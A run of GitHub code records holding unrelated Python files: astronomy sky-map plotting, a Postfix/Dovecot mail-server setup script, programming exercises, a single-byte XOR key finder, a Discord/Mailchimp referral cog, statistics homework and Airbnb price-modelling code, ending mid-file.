va=\"center\")\n\n skyPosList = [wcs.pixelToSky(pos).getPosition(afwGeom.degrees) for pos in tractPosList]\n ax.set_xlim(max(coord[0] for coord in skyPosList) + 1,\n min(coord[0] for coord in skyPosList) - 1)\n ax.set_ylim(min(coord[1] for coord in skyPosList) - 1, \n max(coord[1] for coord in skyPosList) + 1)\n\n ax.set_xlabel(\"RA (deg.)\")\n ax.set_ylabel(\"Dec (deg.)\")\n ax.set_title(title)\n return ax\n\nfor directory in ['full_focalplane_undithered',\n 'DC1-imsim-dithered',\n 'DC1-phoSim-3a']:\n butler = dafPersist.Butler(os.path.join(DATA_DIR, directory))\n skyMap = butler.get(\"deepCoadd_skyMap\")\n plotSkyMap(skyMap, tract=0, title=directory)\n\ntractInfo = skyMap[0]\nwcs = tractInfo.getWcs()\n\nfig = plt.figure(figsize=(12,8))\nax = fig.add_subplot(111)\nplotBox = afwGeom.Box2D(tractInfo.getPatchInfo([0, 0]).getOuterBBox())\nfor x in range(2):\n for y in range(2):\n # Plot outer BBOX\n patchInfo = tractInfo.getPatchInfo([x, y])\n patchBox = afwGeom.Box2D(patchInfo.getOuterBBox())\n plotBox.include(patchBox)\n pixelPatchList = patchBox.getCorners()\n path = makePatch(pixelPatchList, wcs)\n patch = patches.PathPatch(path, alpha=0.2, lw=1)\n ax.add_patch(patch)\n # Plot inner BBox\n patchBox = afwGeom.Box2D(patchInfo.getInnerBBox())\n pixelPatchList = patchBox.getCorners()\n path = makePatch(pixelPatchList, wcs)\n patch = patches.PathPatch(path, fill=None, lw=1, \n linestyle='dotted', color='k')\n ax.add_patch(patch)\n \n center = wcs.pixelToSky(patchBox.getCenter()).getPosition(afwGeom.degrees)\n ax.text(center[0], center[1], 'patchID=%d,%d'%(x,y), size=12, ha=\"center\", va=\"center\")\n\nskyPosList = [wcs.pixelToSky(pos).getPosition(afwGeom.degrees) for pos in plotBox.getCorners()]\nax.set_xlim(max(coord[0] for coord in skyPosList),\n min(coord[0] for coord in skyPosList))\nax.set_ylim(min(coord[1] for coord in skyPosList), \n max(coord[1] for coord in skyPosList))\nax.set_xlabel(\"RA (deg.)\")\nax.set_ylabel(\"Dec (deg.)\")\nax.set_title(\"Zoom in\")\n\n","repo_name":"mixmikmic/GH_code_analysis","sub_path":"python/DESC-SSim Patch Geometry.py","file_name":"DESC-SSim Patch Geometry.py","file_ext":"py","file_size_in_byte":4280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"25669479226","text":"class Milestone:\n\n def __init__(self, vertical, row):\n #['Vertical', 'Goal', 'Workstreams', 'Workstream Status', 'Completion Target', 'Highlight', 'Gap', 'People', '']\n #print '*****************************start Milestone init*****************************'\n self.vertical = vertical\n self.content = row\n self.milestonename = row[2]\n self.milestone_status = row[3] # row 3 = Workstream Status\n self.completion_target_data = row[4] # row 4 = Completion Target\n #self.completetion_eta\n self.highlight = row[5] # row 5 = Highlight\n self.risk = row[6] # row 6 = Gap\n self.poc = row[7] # row 7 = People\n # self.status = status\n # other items to include in future\n # self.impact = impact\n # self.notes = notes\n #print '*****************************end Milestone init*****************************'\n\n def __repr__(self):\n return '__repr__'\n","repo_name":"hitaazad/reporting","sub_path":"milestone.py","file_name":"milestone.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"34017358848","text":"import subprocess\nimport fileinput\n\ndef postfix(name, dname):\n \"\"\"Automations of Sam Hobbs's tutorial for making a Raspberry Pi email server, part 1 (Postfix).\n https://samhobbs.co.uk/2013/12/raspberry-pi-email-server-part-1-postfix\"\"\"\n \n \n #Update system and install Postfix.\n print(\"\"\"\n ######################################################################\n \n Select \"Internet Site\" and then set the mail name to your domain name,\n not including www. (e.g. arta.space).\n \n ######################################################################\n\"\"\")\n \n wait = input(\"When ready press enter to continue.\")\n \n subprocess.call(['apt-get', 'update'])\n subprocess.call(['apt-get', 'install', 'postfix'])\n\n #Open main.cf and make a backup of it.\n with fileinput.FileInput('/etc/postfix/main.cf', inplace=True, backup='.backup') as f:\n for line in f:\n print(line.replace('', ''), end='')\n\n #Tell Postfix to use the Maildir format, add the following lines to /etc/postfix/main.cf\n with open(\"/etc/postfix/main.cf\", \"a\") as f:\n f.write(\"\\nhome_mailbox = Maildir/\\n\")\n #f.write(\"\\nmailbox_command =\")\n \n #Install Dovecot\n subprocess.call(['apt-get', 'update'])\n subprocess.call(['apt-get', 'install', 'dovecot-common', 'dovecot-imapd'])\n\n #We also need to create the mail directory and its subfolders for existing users, \n #and add some things to /etc/skel (the template for new users)\n #so that if you create a new account this will be done automatically.\n #Run the following commands to create the template files.\n subprocess.call(['maildirmake.dovecot', '/etc/skel/Maildir'])\n subprocess.call(['maildirmake.dovecot', '/etc/skel/Maildir/.Drafts'])\n subprocess.call(['maildirmake.dovecot', '/etc/skel/Maildir/.Sent'])\n subprocess.call(['maildirmake.dovecot', '/etc/skel/Maildir/.Spam'])\n subprocess.call(['maildirmake.dovecot', '/etc/skel/Maildir/.Trash'])\n subprocess.call(['maildirmake.dovecot', '/etc/skel/Maildir/.Templates'])\n\n #Next, copy the files over to existing users’ home directories, and change the ownership and permissions for privacy.\n subprocess.call(['cp', '-r', '/etc/skel/Maildir', '/home/' + name + '/'])\n subprocess.call(['chown', '-R', name + ':' + name, '/home/'+name+'/Maildir'])\n subprocess.call(['chmod', '-R', '700', '/home/'+name+'/Maildir'])\n \n #Add the following to /etc/postfix/main.cf to restrict who can send emails to external mail servers:\n with open(\"/etc/postfix/main.cf\", \"a\") as f:\n f.write(\"\"\"\nsmtpd_recipient_restrictions =\n permit_sasl_authenticated,\n permit_mynetworks,\n reject_unauth_destination\n\"\"\")\n \n #Modify helo access restrictions by adding the following to /etc/postfix/main.cf to block spam.\n with open(\"/etc/postfix/main.cf\", \"a\") as f:\n f.write(\"\"\"\nsmtpd_helo_required = yes\nsmtpd_helo_restrictions =\n permit_mynetworks,\n permit_sasl_authenticated,\n reject_invalid_helo_hostname,\n reject_non_fqdn_helo_hostname,\n reject_unknown_helo_hostname,\n check_helo_access hash:/etc/postfix/helo_access\n\"\"\")\n \n #That last line in smtpd_helo_restrictions checks a file for custom rules you’ve built in. Create the file.\n with open(\"/etc/postfix/helo_access\", \"a\") as f:\n f.write(dname+\" REJECT Get lost - you're lying about who you are\\n\")\n f.write(\"mail.\"+dname+\" REJECT Get lost - you're lying about who you are\\n\")\n f.write(\"webmail.\"+dname+\" REJECT Get lost - you're lying about who you are\\n\")\n \n #Now tell postfix to map the file, and restart postfix.\n subprocess.call(['postmap', '/etc/postfix/helo_access'])\n subprocess.call(['service', 'postfix', 'restart'])\n","repo_name":"artizzle/pimail","sub_path":"postfix.py","file_name":"postfix.py","file_ext":"py","file_size_in_byte":3856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"5945438899","text":"\"\"\"\nСнежинка\n\"\"\"\n\nn = int(input())\nmid = n // 2\nfor i in range(n):\n for j in range(n):\n if i == mid or j == mid or i == j or i + j == n - 1:\n print('*', end=' ')\n else:\n print('.', end=' ')\nprint()\n\n\"\"\"\nДиагонали, паралелльные главной\n\"\"\"\n\nn = int(input())\na = []\n\nfor i in range(n):\n row = []\n for j in range(n):\n diff = abs(i - j)\n row.append(diff)\n a.append(row)\n\nfor row in a:\n row_str = ' '.join([str(i) for i in row])\n print(row_str)\n\n\"\"\"\nПобочная диагональ\n\"\"\"\n\nn = int(input())\n\n# Create\nmatrix = []\nfor i in range(n):\n matrix.append([0] * n)\n\n# Set values in the matrix\nfor i in range(n):\n matrix[i][n - i - 1] = 1\n for j in range(n - i, n):\n matrix[i][j] = 2\n\n# Print\nfor row in matrix:\n print(' '.join([str(i) for i in row]))\n\n\"\"\"\nПоменять столбцы\n\"\"\"\n\ndef SwapColumns(A, i, j):\n for row in A:\n row[i], row[j] = row[j], row[i]\n return A\n\nn, m = map(int, input().split())\nA = []\nfor i in range(n):\n row = list(map(int, input().split()))\n A.append(row)\n\ni, j = map(int, input().split())\n\nprint(SwapColumns(A, i, j))\n\n\"\"\"\nСимметричность массивов\n\"\"\"\n\ndef IsSymmetric(A):\n n = len(A)\n for i in range(n):\n for j in range(i+1, n):\n if A[i][j] != A[j][i]:\n return \"NO\"\n return \"YES\"\n\nresult = IsSymmetric(A)\nprint(result)\n\n\"\"\"\nGjvjubnt vtyz lth;fn d hf,cndt, tujhx xthyzdcrbq kj[\n\"\"\"","repo_name":"meepdd/ProgrammingBasics","sub_path":"15.03.py","file_name":"15.03.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"15224470157","text":"#!/usr/bin/env python3\n\n##\n## EPITECH PROJECT, 2020\n## B-SEC-500-PAR-5-1-caesar-lucas.moritel\n## File description:\n## single_byte_XOR.py\n##\n\nimport os\nimport string\nimport sys\nimport codecs\n\ndef error_gestion_arg(argv):\n if len(argv) != 2:\n print(\"Error: Invalid number of arguments\")\n exit(84)\n if os.path.isfile(argv[1]) == False:\n print(\"Error: The argument is not a file\")\n exit(84)\n\ndef single_char_xor(byt_earray_1, byt_earray_2):\n result = bytearray(len(byt_earray_1))\n for i in range(len(byt_earray_1)):\n result[i] = byt_earray_1[i] ^ byt_earray_2[i]\n return result\n\ndef score(input_bytes):\n character_frequencies = {\n ' ': 0.13,\n 'e': 0.12702,\n 't': 0.091,\n 'a': 0.082,\n 'o': 0.075,\n 'i': 0.07,\n 'n': 0.067,\n 's': 0.063,\n 'h': 0.061,\n 'r': 0.06,\n 'd': 0.043,\n 'l': 0.04,\n 'c': 0.028,\n 'u': 0.028,\n 'm': 0.024,\n 'w': 0.024,\n 'f': 0.022,\n 'g': 0.02,\n 'y': 0.02,\n 'p': 0.019,\n 'b': 0.015,\n 'v': 0.0098,\n 'k': 0.0077,\n 'j': 0.0015,\n 'x': 0.0015,\n 'q': 0.00095,\n 'z': 0.00074\n }\n return sum([character_frequencies.get(chr(byte), 0) for byte in input_bytes.lower()])\n\ndef main():\n error_gestion_arg(sys.argv)\n file = open(sys.argv[1], \"r\")\n fileContent = file.read().strip()\n if fileContent == \"\":\n print(\"Error: File is empty\")\n exit(84)\n fileContent = fileContent.replace('\\n', '')\n if all(chara in string.hexdigits for chara in fileContent) == False:\n print(\"Error: No hexadecimal base\")\n exit(84)\n contentSize = len(fileContent) % 2\n if contentSize != 0:\n print(\"Error: Length of the file content is not even but odd\")\n exit(84)\n byt_earray_1 = bytearray.fromhex(fileContent)\n max_frequency_score = 0\n key = 0\n for i in range(256):\n byt_earray_2 = [i] * len(byt_earray_1)\n encrypted_content = bytes(single_char_xor(byt_earray_1, byt_earray_2))\n current_frequency_score = score(encrypted_content)\n if max_frequency_score == 0 or current_frequency_score > max_frequency_score:\n max_frequency_score = current_frequency_score\n key = bytes([i])\n final_key = codecs.decode(codecs.encode(key, 'hex'), 'utf-8')\n print(final_key.upper())\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Auguste0904/CAESAR","sub_path":"src/single_byte_XOR.py","file_name":"single_byte_XOR.py","file_ext":"py","file_size_in_byte":2457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"32935311791","text":"import discord\nfrom discord.ext import commands\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\nfrom urllib.parse import urlparse, parse_qs\nimport requests\nimport base64\nimport json\nimport _thread\n\nstart_server()\n\nclass Mycog:\n \"\"\"My custom cog that does stuff!\"\"\"\n\n def __init__(self, bot):\n self.bot = bot\n start_server()\n\n @commands.command()\n async def mycom(self):\n \"\"\"This does stuff!\"\"\"\n\n #Your code will go here\n await self.bot.say(\"I can do stuff!\")\n\ndef setup(bot):\n bot.add_cog(Mycog(bot))\n\n\nclass SimpleHTTPRequestHandler(BaseHTTPRequestHandler):\n\n def do_GET(self):\n try:\n query = parse_qs(urlparse(self.path).query)\n if \"eid\" in query:\n eid = query[\"eid\"][0]\n\n auth = 'Basic ' + base64.b64encode(bytes('anystring:xxxxxx', 'utf-8')).decode('ascii')\n listId = 'xxxxx'\n \n # 1) Get Member\n url = 'https://us16.api.mailchimp.com/3.0/lists/{0}/members/{1}'.format(listId , eid)\n r = requests.get(url, headers = {'Authorization': auth}, params={'fields': 'merge_fields'}, timeout=1)\n print(r)\n jsonData = json.loads(r.text)\n print(json.dumps(jsonData, indent=4, sort_keys=True))\n\n inviteCode = jsonData['merge_fields']['INVCODE']\n referrer = jsonData['merge_fields']['REF']\n \n # 2) Update Member with invite code if doesnt exist\n # if inviteCode == '':\n #generate code\n #use code\n\n # 3) Get Refferer Member\n if referrer != 'false' and inviteCode == '':\n url = 'https://us16.api.mailchimp.com/3.0/lists/{0}/members/{1}'.format(listId , referrer)\n r = requests.get(url, headers = {'Authorization': auth}, params={'fields': 'merge_fields'}, timeout=1)\n print(r)\n jsonData = json.loads(r.text)\n print(json.dumps(jsonData, indent=4, sort_keys=True))\n\n refCount = 0\n if jsonData['merge_fields']['REFERRALS'] != '' :\n refCount = jsonData['merge_fields']['REFERRALS']\n refCount += 1\n print('refcount:' + str(refCount))\n\n # 4)Update Refferer Member referral count\n url = 'https://us16.api.mailchimp.com/3.0/lists/{0}/members/{1}'.format(listId , referrer)\n r = requests.patch(url, headers = {'Authorization': auth}, data = json.dumps({'merge_fields': {'REFERRALS': refCount}}), timeout=1)\n print(r.request.body)\n print(r)\n jsonData = json.loads(r.text)\n print(json.dumps(jsonData, indent=4, sort_keys=True))\n\n\n redirect = 'https://www.iloveonlinegaming.com/discord'\n html = ''\n\n self.send_response(200)\n self.end_headers()\n self.wfile.write(html.encode())\n\n except Exception as e: \n print(e)\n\ndef start_server():\n httpd = HTTPServer(('localhost', 8000), SimpleHTTPRequestHandler)\n try:\n _thread.start_new_thread( httpd.serve_forever() )\n except:\n print (\"Error: unable to start server thread\")\n","repo_name":"ashneverdawn/discord-inviter","sub_path":"discord-inviter.py","file_name":"discord-inviter.py","file_ext":"py","file_size_in_byte":3491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"27643516892","text":"def check(g, k, n, stocks):\n t = g * k\n i = 0\n while i < n:\n if stocks[i] > g:\n t = t - g\n else:\n t = t - stocks[i]\n i += 1\n\n if t <= 0:\n return True\n return False\n\n\ndef solve(n, k, stock):\n sums = 0\n for i in range(n):\n sums += stock[i]\n\n ans = 0\n\n lo, hi = 0, 1e18\n y = 0\n\n while lo <= hi and y == 0:\n mid = (lo + hi) // 2\n # print(mid)\n if (check(mid, k, n, stock) == True and check(mid + 1, k, n, stock) == False):\n ans = mid\n y = 1\n elif check(mid, k, n, stock) == True:\n lo = mid + 1\n else:\n hi = mid - 1\n\n return ans\n\n\nif __name__ == \"__main__\":\n print(solve(n=4, k=2, stock=[2, 3, 5, 3]))\n","repo_name":"sanial2001/de-shaw","sub_path":"fictional stock market.py","file_name":"fictional stock market.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"5090928116","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jan 6 11:47:27 2019\n\n@author: christopher\n\"\"\"\n\n# --- 2.2\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\n\n\nschlamm = pd.read_table(r\"./klaerschlamm.dat\", sep=\" \")\nschlamm.describe()\nschlamm.head()\nschlamm.drop(\"Labor\", 1)\n \n\nplt.subplot(221)\nschlamm[\"Pr1\"].plot(kind=\"box\")\nplt.subplot(222)\nschlamm[\"Pr2\"].plot(kind=\"box\")\nplt.subplot(223)\nschlamm[\"Pr3\"].plot(kind=\"box\")\nplt.subplot(224)\nschlamm[\"Pr4\"].plot(kind=\"box\")\n\nplt.subplots_adjust(hspace=0.5, wspace=0.3)\n\nplt.show()\n\n\nplt.subplot(221)\nschlamm[\"Pr5\"].plot(kind=\"box\")\nplt.subplot(222)\nschlamm[\"Pr6\"].plot(kind=\"box\")\nplt.subplot(223)\nschlamm[\"Pr7\"].plot(kind=\"box\")\nplt.subplot(224)\nschlamm[\"Pr8\"].plot(kind=\"box\")\n\nplt.subplots_adjust(hspace=0.5, wspace=0.3)\n\nplt.show()\n\n\nplt.subplot(221)\nschlamm[\"Pr9\"].plot(kind=\"box\")\n\nplt.subplots_adjust(hspace=0.5, wspace=0.3)\n\nplt.show()\n\n\nschlamm\nschlamm_centered = schlamm.drop(\"Labor\", 1) - schlamm.drop(\"Labor\", 1).median()\nschlamm_centered.T.plot(kind=\"box\")\n\n\n# --- 2.4\n\nhubble = pd.read_table(r\"hubble.txt\", sep=\" \")\nhubble.describe()\nhubble.loc[2:7, \"distance\"]\n\n\n\nhubble.plot(kind=\"scatter\", x=\"distance\", y=\"recession.velocity\")\nb,a = np.polyfit(hubble[\"distance\"], hubble[\"recession.velocity\"], deg=1)\nx = np.linspace(hubble[\"distance\"].min(), hubble[\"distance\"].max())\nplt.plot(x, a+b*x, c=\"magenta\")\n\nplt.show()\n\nhubble.corr()\n\n\n# --- 2.5\n\nincome = pd.read_table(r\"./income.dat\", sep=\" \")\nincome.head()\n\ninc_2005=income[\"Income2005\"]\nafqt=income[\"AFQT\"]\n\nincome.plot(kind=\"scatter\", x=\"AFQT\", y=\"Income2005\")\nb, a = np.polyfit(afqt, inc_2005, deg=1)\nx = np.linspace(afqt.min(), afqt.max())\nplt.plot(x, a+b*x, c=\"orange\")\nplt.show()\n\nb, a\n\nincome.corr() # keine Korrelation zwischen AFQT und Income2005\n\n\neduc=income[\"Educ\"]\n\nincome.plot(kind=\"scatter\", x=\"Educ\", y=\"Income2005\")\nb, a = np.polyfit(educ, inc_2005, deg=1)\nx = np.linspace(educ.min(), educ.max())\nplt.plot(x, a+b*x, c=\"orange\")\nplt.show()\n\nb, a\n\nincome.corr() # keine Korrelation zwischen AFQT und Educ\n\nx1 = np.array([10, 8, 13, 9, 11, 14, 6, 4, 12, 7, 5])\ny1 = np.array([8.04, 6.95, 7.58, 8.81, 8.33, 9.96, 7.24, 4.26, 10.84, 4.82, 5.68]) \ny2 = np.array([9.14, 8.14, 8.74, 8.77, 9.26, 8.10, 6.13, 3.10, 9.13, 7.26, 4.74]) \ny3 = np.array([7.46, 6.77, 12.74, 7.11, 7.81, 8.84, 6.08, 5.39, 8.15, 6.42, 5.73]) \nx4 = np.array([8, 8, 8, 8, 8, 8, 8, 19, 8, 8, 8])\ny4 = np.array([6.58, 5.76, 7.71, 8.84, 8.47, 7.04, 5.25, 12.50, 5.56, 7.91, 6.89])\n\n\nplt.subplot(221)\nx1.plot(kind=\"scatter\")\nb, a = np.polyfit(x1, y1, deg=1)\nx = np.linspace(x1.min(), x1.max())\nplt.plot(x, a+b*x, c=\"violet\")\n\nplt.subplot(222)\nb, a = np.polyfit(x1, y1, deg=1)\nx = np.linspace(x1.min(), x1.max())\nplt.plot(x, a+b*z, c=\"violet\")","repo_name":"christopherchristensen/summaries","sub_path":"stat/archive/prep/sw02/prep-sw02.py","file_name":"prep-sw02.py","file_ext":"py","file_size_in_byte":2771,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"39015104470","text":"#!usr/bin/env python3\n# keattisak wongsathan\n# 600510532\n# Lab 11\n# Problem 4\n# 204111 SEC 001\n\ndef main():\n list_a = [1, 2, [[2, [[145], 34]], [48, 22]]]\n print(sum_nested_list(list_a))\n\ndef sum_nested_list(list_a):\n list_b = []\n for number in list_a:\n list_b.append(number)\n\n j=0\n while j != len(list_b):\n if type(list_b[j]) == int:\n j+=1\n else:\n list_b.extend(list_b.pop(j))\n return sum(list_b)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"picuzzo2/Lab101and103","sub_path":"Lab11/Lab11_4_600510532.py","file_name":"Lab11_4_600510532.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"23493201976","text":"import pandas as pd\nimport pathlib\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport plotly.express as px\nfrom sklearn.metrics import r2_score, mean_squared_error\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.ensemble import RandomForestRegressor, ExtraTreesRegressor\nfrom sklearn.model_selection import train_test_split\n#Importando a base de dados\nmeses = {'jan': 1,\n 'fev': 2,\n 'mar': 3,\n 'abr': 4,\n 'mai': 5,\n 'jun': 6,\n 'jul': 7,\n 'ago': 8,\n 'set': 9,\n 'out': 10,\n 'nov': 11,\n 'dez': 12}\ncaminho_bases = pathlib.Path('dataset')\nbase_airbnb = pd.DataFrame()\nfor arquivo in caminho_bases.iterdir():\n nome_mes = arquivo.name[:3]\n mes = meses[nome_mes]\n ano = arquivo.name[-8:]\n ano = int(ano.replace('.csv', ''))\n df = pd.read_csv(caminho_bases/arquivo.name, low_memory=False)\n df['ano'] = ano\n df['mes'] = mes\n base_airbnb = base_airbnb.append(df)\n#print(base_airbnb)\n#Tratamentos\n#print(list(base_airbnb.columns))\nbase_airbnb.head(1000).to_csv('primeiros_registros.csv', sep=';')\ncolunas = ['host_response_time', 'host_response_rate', 'host_is_superhost', 'host_listings_count',\n'latitude', 'longitude', 'property_type', 'room_type', 'accommodates', 'bathrooms', 'bedrooms',\n'beds', 'bed_type', 'amenities', 'price', 'security_deposit', 'cleaning_fee', 'guests_included', \n'extra_people', 'minimum_nights', 'maximum_nights', 'number_of_reviews', 'review_scores_rating', \n'review_scores_accuracy', 'review_scores_cleanliness', 'review_scores_checkin', 'review_scores_communication',\n'review_scores_location', 'review_scores_value', 'instant_bookable', 'is_business_travel_ready',\n'cancellation_policy', 'ano', 'mes']\nbase_airbnb = base_airbnb.loc[:, colunas]\n#print(list(base_airbnb.columns))\n#print(base_airbnb)\n#Tratar os valores faltando\nfor coluna in base_airbnb:\n if base_airbnb[coluna].isnull().sum() > 70000:\n base_airbnb = base_airbnb.drop(coluna, axis=1)\n#print(base_airbnb.isnull().sum())\nbase_airbnb = base_airbnb.dropna()\n#print(base_airbnb.shape)\n#print(base_airbnb.isnull().sum())\n#Verificar os tipos de dados em cada coluna\n#print(base_airbnb.dtypes)\n#print('-'*60)\n#print(base_airbnb.iloc[0])\n#price\nbase_airbnb['price'] = base_airbnb['price'].str.replace('$', '')\nbase_airbnb['price'] = base_airbnb['price'].str.replace(',', '')\nbase_airbnb['price'] = base_airbnb['price'].astype(np.float32, copy=False)\n#extra people\nbase_airbnb['extra_people'] = base_airbnb['extra_people'].str.replace('$', '')\nbase_airbnb['extra_people'] = base_airbnb['extra_people'].str.replace(',', '')\nbase_airbnb['extra_people'] = base_airbnb['extra_people'].astype(np.float32, copy=False)\n#verificando os tipos\n#print(base_airbnb.dtypes)\n#Analise exploratoria e tratar outliers\nplt.figure(figsize=(15, 10))\nsns.heatmap(base_airbnb.corr(), annot=True, cmap='Greens')\n#print(base_airbnb.corr())\n#Definição de funções para analise de outliers\ndef limites(coluna):\n q1 = coluna.quantile(0.25)\n q3 = coluna.quantile(0.75)\n amplitude = q3 - q1\n return q1 - 1.5 * amplitude, q3 + 1.5 * amplitude\n\ndef excluir_outliers(df, nome_coluna):\n qtde_linhas = df.shape[0]\n lim_inf, lim_sup = limites(df[nome_coluna])\n df = df.loc[(df[nome_coluna] >= lim_inf) & (df[nome_coluna] <= lim_sup), :]\n linhas_removidas = qtde_linhas - df.shape[0]\n return df, linhas_removidas\n\ndef diagrama_caixa(coluna):\n fig, (ax1, ax2) = plt.subplots(1, 2)\n fig.set_size_inches(15, 5)\n sns.boxplot(x=coluna, ax=ax1)\n ax2.set_xlim(limites(coluna))\n sns.boxplot(x=coluna, ax=ax2)\n\ndef histograma(coluna):\n plt.figure(figsize=(15, 5))\n sns.distplot(coluna, hist=True)\n\ndef grafico_barra(coluna):\n plt.figure(figsize=(15, 5))\n ax = sns.barplot(x=coluna.value_counts().index, y=coluna.value_counts())\n ax.set_xlim(limites(coluna))\n#price\n#diagrama_caixa(base_airbnb['price'])\n#histograma(base_airbnb['price'])\nbase_airbnb, linhas_removidas = excluir_outliers(base_airbnb, 'price')\nprint('{} linhas removidas'.format(linhas_removidas))\n#histograma(base_airbnb['price'])\nprint(base_airbnb.shape)\n#extra_people\n#diagrama_caixa(base_airbnb['extra_people'])\n#histograma(base_airbnb['extra_people'])\nbase_airbnb, linhas_removidas = excluir_outliers(base_airbnb, 'extra_people')\nprint('{} linhas removidas'.format(linhas_removidas))\n#histograma(base_airbnb['extra_people'])\nprint(base_airbnb.shape)\n#host_listings_count\n#diagrama_caixa(base_airbnb['host_listings_count'])\n#grafico_barra(base_airbnb['host_listings_count'])\nbase_airbnb, linhas_removidas = excluir_outliers(base_airbnb, 'host_listings_count')\nprint('{} linhas removidas'.format(linhas_removidas))\nprint(base_airbnb.shape)\n#accommodates\n#diagrama_caixa(base_airbnb['accommodates'])\n#grafico_barra(base_airbnb['accommodates'])\nbase_airbnb, linhas_removidas = excluir_outliers(base_airbnb, 'accommodates')\nprint('{} linhas removidas'.format(linhas_removidas))\nprint(base_airbnb.shape)\n#bathrooms\nbase_airbnb, linhas_removidas = excluir_outliers(base_airbnb, 'bathrooms')\nprint('{} linhas removidas'.format(linhas_removidas))\nprint(base_airbnb.shape)\n#bedrooms\nbase_airbnb, linhas_removidas = excluir_outliers(base_airbnb, 'bedrooms')\nprint('{} linhas removidas'.format(linhas_removidas))\nprint(base_airbnb.shape)\n#beds\nbase_airbnb, linhas_removidas = excluir_outliers(base_airbnb, 'beds')\nprint('{} linhas removidas'.format(linhas_removidas))\nprint(base_airbnb.shape)\n#guests_included\nbase_airbnb = base_airbnb.drop('guests_included', axis = 1)\nprint(base_airbnb.shape)\n#minimum_nights\nbase_airbnb, linhas_removidas = excluir_outliers(base_airbnb, 'minimum_nights')\nprint('{} linhas removidas'.format(linhas_removidas))\nprint(base_airbnb.shape)\n#maximum_nights\nbase_airbnb = base_airbnb.drop('maximum_nights', axis = 1)\nprint(base_airbnb.shape)\n#number_of_reviews\nbase_airbnb = base_airbnb.drop('number_of_reviews', axis = 1)\nprint(base_airbnb.shape)\n#Tratamento de colunas de valores de texto\n#print(base_airbnb['property_type'].value_counts())\ntabela_tipos_casa = base_airbnb['property_type'].value_counts()\ncolunas_agrupar = []\nfor tipo in tabela_tipos_casa.index:\n if tabela_tipos_casa[tipo] < 500:\n colunas_agrupar.append(tipo)\nprint(colunas_agrupar)\nfor tipo in colunas_agrupar:\n base_airbnb.loc[base_airbnb['property_type']==tipo, 'property_type'] = 'Outros'\nprint(base_airbnb['property_type'].value_counts())\n#room_type\nprint(base_airbnb['room_type'].value_counts())\n#bed_type\nprint(base_airbnb['bed_type'].value_counts())\n# agrupando categorias de bed_type\ntabela_bed = base_airbnb['bed_type'].value_counts()\ncolunas_agrupar = []\nfor tipo in tabela_bed.index:\n if tabela_bed[tipo] < 10000:\n colunas_agrupar.append(tipo)\nprint(colunas_agrupar)\nfor tipo in colunas_agrupar:\n base_airbnb.loc[base_airbnb['bed_type']==tipo, 'bed_type'] = 'Outros'\nprint(base_airbnb['bed_type'].value_counts())\n#cancellation_policy\nprint(base_airbnb['cancellation_policy'].value_counts())\n# agrupando categorias de cancellation_policy\ntabela_cancellation = base_airbnb['cancellation_policy'].value_counts()\ncolunas_agrupar = []\nfor tipo in tabela_cancellation.index:\n if tabela_cancellation[tipo] < 10000:\n colunas_agrupar.append(tipo)\nprint(colunas_agrupar)\nfor tipo in colunas_agrupar:\n base_airbnb.loc[base_airbnb['cancellation_policy']==tipo, 'cancellation_policy'] = 'Outros'\nprint(base_airbnb['cancellation_policy'].value_counts())\n#amenities\nprint(base_airbnb['amenities'].iloc[1].split(','))\nprint(len(base_airbnb['amenities'].iloc[1].split(',')))\nbase_airbnb['n_amenities'] = base_airbnb['amenities'].str.split(',').apply(len)\nbase_airbnb = base_airbnb.drop('amenities', axis = 1)\nprint(base_airbnb.shape)\nbase_airbnb, linhas_removidas = excluir_outliers(base_airbnb, 'n_amenities')\nprint('{} linhas removidas'.format(linhas_removidas))\nprint(base_airbnb.shape)\n#Visualizacao de Mapa de Propriedades\namostra = base_airbnb.sample(n=5000)\ncentro_mapa = {'lat':amostra.latitude.mean(), 'lon':amostra.latitude.mean()}\nmapa = px.density_mapbox(amostra, lat='latitude', lon='longitude',z='price', radius=2.5,\n center=centro_mapa, zoom=10,\n mapbox_style='stamen-terrain')\n#mapa.show()\n#Enconding\ncolunas_tf = ['host_is_superhost', 'instant_bookable', 'is_business_travel_ready']\nbase_airbnb_cod = base_airbnb.copy()\nfor coluna in colunas_tf:\n base_airbnb_cod.loc[base_airbnb_cod[coluna]=='t', coluna] = 1\n base_airbnb_cod.loc[base_airbnb_cod[coluna]=='f', coluna] = 0\ncolunas_categorias = ['property_type', 'room_type', 'bed_type', 'cancellation_policy']\nbase_airbnb_cod = pd.get_dummies(data=base_airbnb_cod, columns=colunas_categorias)\nprint(base_airbnb_cod.head())\n#Modelo de Previsão\ndef avaliar_modelo(nome_modelo, y_test, previsao):\n r2 = r2_score(y_test, previsao)\n RSME = np.sqrt(mean_squared_error(y_test, previsao))\n return f'Modelo {nome_modelo}:\\nR2:{r2:.2%}\\nRSME:{RSME:.2f}'\n \nmodelo_rf = RandomForestRegressor()\nmodelo_lr = LinearRegression()\nmodelo_et = ExtraTreesRegressor()\nmodelos = {\n 'RandomForest': modelo_rf,\n 'LinearRegression': modelo_lr,\n 'ExtraTreesRegressor': modelo_et\n}\ny = 